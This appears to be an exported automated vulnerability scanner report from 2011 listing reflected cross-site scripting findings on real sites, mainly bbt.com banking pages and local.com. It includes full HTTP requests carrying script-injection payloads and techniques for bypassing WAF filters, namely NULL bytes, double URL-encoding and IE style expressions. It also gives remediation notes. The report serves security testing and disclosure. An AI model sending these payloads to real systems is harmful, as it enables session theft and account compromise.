<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/mobile/mobile-product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30271 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/checkcard/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 31030 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/onlinebanking/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35938 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 32253 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 207 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao-matrix/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:34 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 218 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 211 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/vcsp/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 212 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brothercake.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1 Host: www.brothercake.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:22:32 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Cache-control: private Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/ Connection: close Content-Type: text/html Content-Length: 20228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1107
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1062
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.
